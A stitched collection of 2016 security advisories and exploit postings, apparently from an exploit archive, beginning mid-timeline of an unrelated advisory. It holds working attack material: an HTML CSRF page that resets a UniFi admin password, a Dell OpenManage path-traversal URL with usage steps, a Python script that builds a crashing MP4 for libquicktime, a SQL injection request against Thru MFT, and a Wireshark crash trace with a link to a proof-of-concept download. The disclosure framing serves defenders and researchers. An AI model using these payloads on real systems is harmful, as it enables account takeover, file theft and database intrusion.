1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through through the contact form in
his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
"""
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
-----------------------
Product: Ubiquiti Networks UniFi
Vendor URL: www.ubnt.com
Type: Cross-Site Request Forgery [CWE-353]
Date found: 2015-03-19
Date published: 2016-02-23
CVSSv3 Score: 6.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)
CVE: -
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
UniFi v3.2.10
older versions may be affected too.
4. INTRODUCTION
---------------
The UniFi® Controller software is a powerful, enterprise wireless software
engine ideal for high-density client deployments requiring low latency and
high uptime performance. A single UniFi Controller running in the cloud
can manage multiple sites: multiple, distributed deployments and
multi-tenancy for managed service providers.
(from the vendor's homepage)
5. VULNERABILITY DESCRIPTION
----------------------------
A generic Cross-Site Request Forgery protection bypass vulnerability was
identified in UniFi v3.2.10 and prior.
The application uses a CSRF protection, which is based on verifying the
Referer header, but does not catch the case where the Referer header
is completely missing.
This leads to a generic CSRF protection bypass, resulting in all
application specific functionalities becoming vulnerable. An attacker needs
to trick the victim to visit an arbitrary website in order to exploit the
vulnerability. Successful exploits can allow the attacker to compromise the
whole application including connected devices, e.g. by changing passwords
of users, adding new users, changing device usernames and passwords or by
creating new WLAN configurations.
6. PROOF-OF-CONCEPT
-------------------
The following PoC changes the password of the user "admin" to "csrfpwd":
<html>
<head>
<script>
function load() {
var postdata = '<form id=csrf method=POST enctype=\'text\/plain\' action=\'https://127.0.0.1:8443/api/s/default/cmd/sitemgr\'>' +
'<input type=hidden name=\'json=%7B%22name%22%3A%22admin%22%2C%22x_password%22%3A%22csrfpwd%22%2C%22email%22%3A%22info%40mail.com%22%2C%22lang%22%3A%22en_US%22%2C%22cmd%22%3A%22set-self%22%7D\' value=\'\' />' +
'</form>';
top.frames[0].document.body.innerHTML=postdata;
top.frames[0].document.getElementById('csrf').submit();
}
</script>
</head>
<body onload="load()">
<iframe src="about:blank" id="noreferer">< /iframe>
</body>
</html>
7. SOLUTION
-----------
Upgrade to UniFi v4.7.5 or later
8. REPORT TIMELINE
------------------
2015-03-19: Discovery of the vulnerability
2015-03-10: Reported via Ubiquiti's Bug Bounty program (hackerone.com)
2015-06-02: Vendor apologizes his backlog
2015-09-28: Asking for status update via HackerOne
2015-09-28: Vendor asks to test against version 4.7.5
2015-10-02: Verified working fix for v4.7.5
2015-10-23: Vendor changes status to "Resolved"
2015-11-24: Asking for coordinated disclosure via email
2015-12-08: No response from vendor
2015-12-08: Requested public disclosure on HackerOne
2016-01-08: Report is published automatically
2016-02-23: Advisory released
9. REFERENCES
-------------
https://www.rcesecurity.com/2016/02/ubiquiti-bug-bounty-unifi-v3-2-10-generic-csrf-protection-bypass
https://hackerone.com/reports/52635
# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated
Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link:
http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64
When authenticated as an admin, make the following adjustments to the URL
below:
1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.
https://
<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.
The path parameter should not be changed; the provided value is essential
to bypassing a security control.
#!/usr/bin/env python
#
###
# - 7 February 2016 -
# My last bug hunting session (*for fun and no-profit*)
# has been dedicated to libquicktime
###
#
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version <= 1.2.4
#
# CVE-ID: CVE-2016-2399
#
# Disclosure part: http://www.nemux.org
#
########
####### Timeline
#
# 07 Feb 2016 Bug discovered
# 17 Feb 2016 Mitre.org contacted
# 17 Feb 2016 Disclosed to the project's maintainer
# 23 Feb 2016 No response from the maintainer
# 23 Feb 2016 Publicly disclosed
#
########
####### References
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
# http://libquicktime.sourceforge.net/
# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html
# https://en.wikipedia.org/wiki/QuickTime\_File\_Format
#
#######
#
# DISCLAIMER: It's just a PoC... it will crash something
#
####
import sys
import struct
import binascii
"""
There needs to be an mp4 file with these nested atoms to trigger the bug:
moov -> trak -> mdia -> hdlr
"""
hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1"
"6D6F6F76" #### moov atom
"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000"
"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000"
"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000"
"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF"
"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
"7472616B" #### trak atom
"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
"6D646961" #### mdia atom
"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
"4E" #### hdlr atom length
"68646C72" #### hdlr atom
"0000000000"
"4141414141414141" #### our airstrip :)
"0000000000000000000000"
"EC" #### 236 > 127 <-- overflow here and a change in signedness too
"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))
def createPoC():
try:
with open("./nemux.mp4","wb") as output:
output.write(hax0r_mp4)
print "[*] The PoC is done!"
except Exception,e:
print str(e)
print "[*] mmmm!"
def usage():
print "\nUsage? Run it -> " + sys.argv[0]
print "this poc creates an mp4 file named nemux.mp4"
print "--------------------------------------------"
print "This dummy help? " + sys.argv[0] + " help\n"
sys.exit()
if __name__ == "__main__":
try:
if len(sys.argv) == 2:
usage()
else:
print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n"
print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
createPoC();
except Exception,e:
print str(e)
print "Ok... Something went wrong..."
sys.exit()
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2015-056
Product: Thru Managed File Transfer Portal
Manufacturer: Thru
Affected Version(s): 9.0.2
Tested Version(s): 9.0.2
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2015-10-28
Solution Date: 2016-01-22
Public Disclosure: 2016-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
(SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Thru Managed File Transfer Portal is a web based file transfer application.
According to the Thru website [1], the application aims to offload large
file transfer to a single platform, to protect files, to replace FTP
servers and to allow access to files anytime, anywhere.
An SQL injection vulnerability was identified in one of the GET request.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in a GET request that causes
contact data to be sorted. At least the attribute values of sortorder
and letterrange are not correctly sanitized and therefore can be abused
to inject arbitrary SQL statements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to show that the SQL statement
causing a delay is executed and results in a 500 server error:
GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
Host: [HOST]
Cookie: [COOKIES]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The reported security vulnerability has been fixed in a new software
release. Update to the new software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-10-27: Vulnerability discovered
2015-10-28: Vulnerability reported to manufacturer
2016-01-22: Manufacturer announced update
2016-02-15: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Thru Homepage
http://www.thruinc.com
[2] SySS Security Advisory SYSS-2015-056
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Erlijn van Genuchten and
Danny Österreicher of the SySS GmbH.
E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
E-Mail: danny.oesterreicher@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
Key ID: 0x96029AC7
Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCgAGBQJWwbbpAAoJEAylhje9lv8qAh4P/1yg6xg5xHvvnh2Al1fy/ley
rABwBv9YmcNhNLASrxPOXGBx6rcuCc5zEdOI62PKv4E19VMcjOvwHw5MzfP/4GDu
LAAku71zIn6YCxYF1NKScyqDeBg6OZfHiW6EP/ufhFD+pzu0FySmj2G3/lflloEX
FBNHzNURGakWizxzaNbnnltI3DuxPss3E67crJMHEPtXUw0dVrQAeMtsyc46708z
pWh1JAvNNIlqyyQwyy3EOvQtOIkYd8SMmayla2CUpl0xC5On5GcxkqvaZcqyScR9
s4rxVS8x7akGDGS/F2aFM2zEfCL5DAXVCoRWTyKYqcMYINdZY3xuREcG3iOXVMrp
yRYBg6dgwf3QHRmCrkZLlKx6hibHG13dRykD7LPcO3H+q81Ll4T/6OuHqbHbPjD2
EeOqW+bKDn//TKrsUbwvaM/1hF96T66QLRvUeTGHbMoNjN3fQTTqdBaYHq8ROiD8
Xc1ybVxgxUMKi+3WEvOw5aYF6Q/RN9Z4WN2p88+MLrBRFCh6nHT0jPKZFyxZuooi
b3MI/qPawWO4HfpjvunCdNGo49I34JCcAsi2Um8qzM/aedbUaH1dqj6sZW4j8bA2
WzwXgwnLXQ+wON/tCDz8Q4NfZWbDG2v1anJBOTIgABjLAeuo0nDaBYonyp4lY/Og
4UaL7kboaGGj3mRINLd8
=df2e
-----END PGP SIGNATURE-----
Source: https://code.google.com/p/google-security-research/issues/detail?id=648
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
READ of size 8 at 0x000005676c18 thread T0
#0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
#1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
#2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
#4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
#6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
#8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
#9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
#10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
#11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
#12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
#13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
#15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
#16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
#18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
#25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
#29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
#30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
#31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
#32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
#38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
#45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
#46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
#47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
#48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
#49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#84 0x53c91b in process_packet wireshark/tshark.c:3728:5
#85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#86 0x52c1df in main wireshark/tshark.c:2197:13
0x000005676c18 is located 8 bytes to the left of global variable '<string literal>' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
'<string literal>' is ascii string 'queryWithPerm '
0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
Shadow bytes around the buggy address:
0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7855==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39484.zip